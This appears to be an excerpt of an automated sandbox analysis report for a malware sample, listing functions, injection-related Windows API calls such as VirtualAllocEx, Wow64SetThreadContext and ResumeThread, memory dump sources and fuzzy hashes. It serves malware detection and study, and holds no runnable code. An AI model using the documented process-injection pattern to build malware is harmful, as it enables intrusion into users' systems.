                                                                                                                                                              control_flow_graph 959 2db8b38-2db8b8b 961 2db8b9b-2db8bcb Wow64SetThreadContext 959->961 962 2db8b8d-2db8b99 959->962 964 2db8bcd-2db8bd3 961->964 965 2db8bd4-2db8c04 961->965 962->961 964->965
                                                                                                                                                              APIs
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02DB8BBE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                              • Opcode ID: 3d2610e893e723f1ef19de97e585ab49ca2493159fa7124e9d278a57817e0a16
                                                                                                                                                              • Instruction ID: c1d31dd3c153060bea9592ef52edf150d530b0facd3964f06a82e560cb47fc52
                                                                                                                                                              • Opcode Fuzzy Hash: 3d2610e893e723f1ef19de97e585ab49ca2493159fa7124e9d278a57817e0a16
                                                                                                                                                              • Instruction Fuzzy Hash: 9C2125B19002498FDB10DFAAC485BEEBBF4AF88324F148429D459A7240DB789945CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02E3B310 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E3BBC1,00000800,00000000,00000000), ref: 02E3BDD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              • Opcode ID: 79cd37693a23ac4e1d69f6e30bb6a678fdb72234a2ed94e51ae12b7f842c52c7
                                                                                                                                                              • Instruction ID: 74fa7d8cfd5c1fbdad1805b2e9e5735ff6a3fa087ef340a9e00f54a3355f7b8d
                                                                                                                                                              • Opcode Fuzzy Hash: 79cd37693a23ac4e1d69f6e30bb6a678fdb72234a2ed94e51ae12b7f842c52c7
                                                                                                                                                              • Instruction Fuzzy Hash: 5A2154B68043898FCB10CFAAC448ADAFBF4AF89314F14806ED599AB211C375A544CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8B40 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02DB8BBE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                              • Opcode ID: da6767fb0e09f167c197380ec51cedeb81c53ff53b9252615a16e671b7a2a02f
                                                                                                                                                              • Instruction ID: e42d72ca9dde0b1a93c4655c440e676cd2488350be8d0afc63a498da6855ca1c
                                                                                                                                                              • Opcode Fuzzy Hash: da6767fb0e09f167c197380ec51cedeb81c53ff53b9252615a16e671b7a2a02f
                                                                                                                                                              • Instruction Fuzzy Hash: F72129B19003098FDB10DFAAC485BEEBBF4EF48324F148429D559A7340DB789945CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8DC8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DB8E48
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                                              • Opcode ID: 033ada7219a1b71491603f721ef4d8e6d50ff6106972f1c96b8d58c5b4c53d74
                                                                                                                                                              • Instruction ID: a88872054c168ab0e3770a49315a13d730ec1cae232ea84f4382735685a27b99
                                                                                                                                                              • Opcode Fuzzy Hash: 033ada7219a1b71491603f721ef4d8e6d50ff6106972f1c96b8d58c5b4c53d74
                                                                                                                                                              • Instruction Fuzzy Hash: 112137B5900359DFCB10DFAAC880AEEFBF5FF48320F10842AE559A7250C7399945DBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02E3DDB9 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E3DD86,?,?,?,?,?), ref: 02E3DE47
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                              • Opcode ID: 63d0e69439ddd3023cd3415faf87ee25a1add46fca386cd6c3c4bb55d6e4e2d1
                                                                                                                                                              • Instruction ID: 2fc33f23193c9f98a4ec80285502166248d98bc530d31eb3618a07b945482bd6
                                                                                                                                                              • Opcode Fuzzy Hash: 63d0e69439ddd3023cd3415faf87ee25a1add46fca386cd6c3c4bb55d6e4e2d1
                                                                                                                                                              • Instruction Fuzzy Hash: 6421E2B5D00219DFDB10CFAAD984ADEBBF4FB48314F14845AE958A7310D378A940CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8A88 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                              • Opcode ID: 9fab73d6875fcd62dda4c2938f784595a197b1d947d802edfdbfc7b94326480c
                                                                                                                                                              • Instruction ID: 0695fb597296a6437053cc502d59ce8201f2ddeddedb96ce5c19a96545cfa099
                                                                                                                                                              • Opcode Fuzzy Hash: 9fab73d6875fcd62dda4c2938f784595a197b1d947d802edfdbfc7b94326480c
                                                                                                                                                              • Instruction Fuzzy Hash: 3E2136B5904249CFCB20DFAAD4446DEFBF8EF88324F24842AD55AA7200C775A944CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02E3B328 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E3BBC1,00000800,00000000,00000000), ref: 02E3BDD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              • Opcode ID: b87061a27bcc3a854de6777de2b112e2701cc6686154060c2f206e27155cff9e
                                                                                                                                                              • Instruction ID: df238d3fbeefc08feb9daabf2e64e698b7db5716c79688fad6a1216b15fb6205
                                                                                                                                                              • Opcode Fuzzy Hash: b87061a27bcc3a854de6777de2b112e2701cc6686154060c2f206e27155cff9e
                                                                                                                                                              • Instruction Fuzzy Hash: A41123B69003499FCB20CF9AC448ADEFBF8EF89314F50842EE55AA7210C375A545CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02E3BD61 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E3BBC1,00000800,00000000,00000000), ref: 02E3BDD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              • Opcode ID: dc1bd1a5b6ea3cb193feee155c227fb4e62378da45e7788711193bb9f1d014f6
                                                                                                                                                              • Instruction ID: d17f3fb8a5656b6b7680e4457c6af43c03f00ad631cd447a240621d168313d2f
                                                                                                                                                              • Opcode Fuzzy Hash: dc1bd1a5b6ea3cb193feee155c227fb4e62378da45e7788711193bb9f1d014f6
                                                                                                                                                              • Instruction Fuzzy Hash: 351123B69002498FCB10CF9AC848ADEFBF4EB88324F10842ED559A7210C375A545CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8C18 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DB8C86
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: c9987ed577adde4882092f3cfadb7ec6afed233c3a3c2158c74134470cd7329f
                                                                                                                                                              • Instruction ID: 90a75948ef88eec0ed21f2400b4430cc871dd58a7f29ae80dd262efbf7a50a62
                                                                                                                                                              • Opcode Fuzzy Hash: c9987ed577adde4882092f3cfadb7ec6afed233c3a3c2158c74134470cd7329f
                                                                                                                                                              • Instruction Fuzzy Hash: 021153B29002498FCB10DFAAC844AEEBFF5EF88320F208419E559A7250C735A940CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8C13 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DB8C86
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: 700ed082f2d067b79f07fdd7735e1d2bfb56f49dd8434bc318f81d86d1cc5821
                                                                                                                                                              • Instruction ID: f25efecea570aa678e64cbb7531e195b8be1108f90b59e7aa5e388ac908be1f7
                                                                                                                                                              • Opcode Fuzzy Hash: 700ed082f2d067b79f07fdd7735e1d2bfb56f49dd8434bc318f81d86d1cc5821
                                                                                                                                                              • Instruction Fuzzy Hash: CA1167B1900249CFCB21DFA9C844BEEBFF5EF88324F24841AE559A7250C735A954CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB8A90 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                              • Opcode ID: efe28332cb6d225ab1264cf90f69b1342226ceb3ccff9f47f0213b37ba6ac95f
                                                                                                                                                              • Instruction ID: 2e609800f1227e68264fbc89e6b3dadc17f8ab988fdc27bd2e7d9a6f64f51095
                                                                                                                                                              • Opcode Fuzzy Hash: efe28332cb6d225ab1264cf90f69b1342226ceb3ccff9f47f0213b37ba6ac95f
                                                                                                                                                              • Instruction Fuzzy Hash: F01128B19002498BCB10DFAAC445BDEFBF8AF88324F208419D459A7250C775A944CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02E3BAE0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E3BB46
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                              • Opcode ID: b63e5d61b4992d2497cf04e90f972c24162b1c9f545424599419ee0ce120c196
                                                                                                                                                              • Instruction ID: 9df722a6b2d714cb63fbc82b724bf38f523c441770a0d26e34e489858f6cac97
                                                                                                                                                              • Opcode Fuzzy Hash: b63e5d61b4992d2497cf04e90f972c24162b1c9f545424599419ee0ce120c196
                                                                                                                                                              • Instruction Fuzzy Hash: 631110B5C002498FCB10CF9AC848ADEFBF4AF88328F10C42AD459B7210C379A545CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DB9E34 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 02DBA515
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                              • Opcode ID: e53275e8573120500357ae1f56c2c46c32672a8484373652a221e668d89a2e84
                                                                                                                                                              • Instruction ID: cb3f5f9ef3997303c1e5bc83d46bf47fb4dd414a9dc59f4a92b1e8459303ee48
                                                                                                                                                              • Opcode Fuzzy Hash: e53275e8573120500357ae1f56c2c46c32672a8484373652a221e668d89a2e84
                                                                                                                                                              • Instruction Fuzzy Hash: 9E1103B5800749DFCB10DF9AC489BDEBBF8EB48324F10845AE959A7310D375A944CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02DBA4B0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 02DBA515
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                              • Opcode ID: 577933a5efe306c20b19855217d9e112ba6007aac5bd4ded965a44521af2ac65
                                                                                                                                                              • Instruction ID: c728f76035a6dd5a27ed0cc47f58cd2b249b9e55f476d594ccf936a5e435214c
                                                                                                                                                              • Opcode Fuzzy Hash: 577933a5efe306c20b19855217d9e112ba6007aac5bd4ded965a44521af2ac65
                                                                                                                                                              • Instruction Fuzzy Hash: 2D11F2B5800249DFDB10DF9AC485BEEBBF8EB48324F208459D559A7340C375AA44CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FEDE1 Relevance: .6, Instructions: 554COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 206082f1646c7defca0a750857a49730e446eaef554730d89071c13741380157
                                                                                                                                                              • Instruction ID: 67b0ac50ad7ec3ab5db741a159f2b236cac29f83a7b16d8c734ebf9d0a4667e9
                                                                                                                                                              • Opcode Fuzzy Hash: 206082f1646c7defca0a750857a49730e446eaef554730d89071c13741380157
                                                                                                                                                              • Instruction Fuzzy Hash: B342F731E106199FCB14DF69C894AEDF7B1FF89300F11869AD559B7261EB30AA85CF40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FAFF1 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 820bf82c630f521aa8eba514572bb1f58bef5888ff5a488f289f9306929dad96
                                                                                                                                                              • Instruction ID: 58d62beaca8833fdefd9bc16d278d399eb1042eee9960d8535547ac3f84efe88
                                                                                                                                                              • Opcode Fuzzy Hash: 820bf82c630f521aa8eba514572bb1f58bef5888ff5a488f289f9306929dad96
                                                                                                                                                              • Instruction Fuzzy Hash: 86510A34A20605CFCB04DF68C898A9DBBB6FF89700F1545A9E5069B371EB71EC45CB80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FB000 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d176599eb9ad2e6a58a96bc78173d07af234da5c5e9c40683e1e69328bc7d0af
                                                                                                                                                              • Instruction ID: 66d0937481cef01bbf58e6fff181f790935ee5fa1e7b2cfce6892f6ebb712d7e
                                                                                                                                                              • Opcode Fuzzy Hash: d176599eb9ad2e6a58a96bc78173d07af234da5c5e9c40683e1e69328bc7d0af
                                                                                                                                                              • Instruction Fuzzy Hash: 7851E734A20605CFCB04EF68C89899DBBB6FF89704F1585A9E5069B371EB71ED45CB40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FA6F0 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 866a7157f5e95dc102daa38988a69b662eaafa9626a88a45a31a7cbfea765dc0
                                                                                                                                                              • Instruction ID: e065734636d929dd05157096a3a79b9f777b3f95110bc9f6e9c5eac09dc28fac
                                                                                                                                                              • Opcode Fuzzy Hash: 866a7157f5e95dc102daa38988a69b662eaafa9626a88a45a31a7cbfea765dc0
                                                                                                                                                              • Instruction Fuzzy Hash: D1416834B142548FDB14DB6AD894EEEBBF6BF49700F1440AAE60AEB361CB71D841CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FB708 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4a3c62a081a3f9deaf0000eeca60144f964da4637b196e6c82280413bf3dec03
                                                                                                                                                              • Instruction ID: a062142348dcb8bc03db94004a9e436e274000d15e5c8f4f2666f5dff6935e3d
                                                                                                                                                              • Opcode Fuzzy Hash: 4a3c62a081a3f9deaf0000eeca60144f964da4637b196e6c82280413bf3dec03
                                                                                                                                                              • Instruction Fuzzy Hash: 70417E31A002198FCB14EF69C595AAFBBF6FF84300B50856ED50A97350EB31A906CBD1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FBCF8 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7be7a97deb4d24b51171e6ccc7754be65e1ac5524fc9a5a8784982f54219a07c
                                                                                                                                                              • Instruction ID: 3528a1bdf518b44e5cb500fac83f6ff8aac48e0755e155976e35b555f49263d9
                                                                                                                                                              • Opcode Fuzzy Hash: 7be7a97deb4d24b51171e6ccc7754be65e1ac5524fc9a5a8784982f54219a07c
                                                                                                                                                              • Instruction Fuzzy Hash: 17412830B012199FCB19DBADD884AEEB7F2EF4A300F10456AE656E7350EB749D418B81
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FB7A0 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 60ad9df506f4df2f0b837a00286651bb0387908540382f3acd0dfc4c88cc0fdb
                                                                                                                                                              • Instruction ID: 6a79c229377a1f37086c416b059fb2c7a6e57a6814767a6931f60a90796bf2a1
                                                                                                                                                              • Opcode Fuzzy Hash: 60ad9df506f4df2f0b837a00286651bb0387908540382f3acd0dfc4c88cc0fdb
                                                                                                                                                              • Instruction Fuzzy Hash: 53418D30A0070A8FCB14DF79D49499EBBB2FF853047108A6ED15AAB351EB31E906CBD1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054F9880 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c33f605a6a3040ae61b6aaca48f6c5439d1db742d4d47d21cae2a049fa5af224
                                                                                                                                                              • Instruction ID: eb4e67ade90e439192fc9ee59d330984c8ad649989d58819d950cbbaa1a7c61b
                                                                                                                                                              • Opcode Fuzzy Hash: c33f605a6a3040ae61b6aaca48f6c5439d1db742d4d47d21cae2a049fa5af224
                                                                                                                                                              • Instruction Fuzzy Hash: C7413E30A10709CFCB04EF68C5949DDFBB6FF89304F008559E2156B365EB71A946CB81
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FFA70 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3904c138654670a5f5d090e29d96ba24431093fd64db00c25263918e73db7fa1
                                                                                                                                                              • Instruction ID: 287a63bf617db1536e607f2c79dd5afafddf7d43c29434887f1220f682482933
                                                                                                                                                              • Opcode Fuzzy Hash: 3904c138654670a5f5d090e29d96ba24431093fd64db00c25263918e73db7fa1
                                                                                                                                                              • Instruction Fuzzy Hash: 31413C31A10709CFCB04EF68C594EDDBBB2FF89304F108569E255AB365EB70A946CB81
                                                                                                                                                              Uniqueness

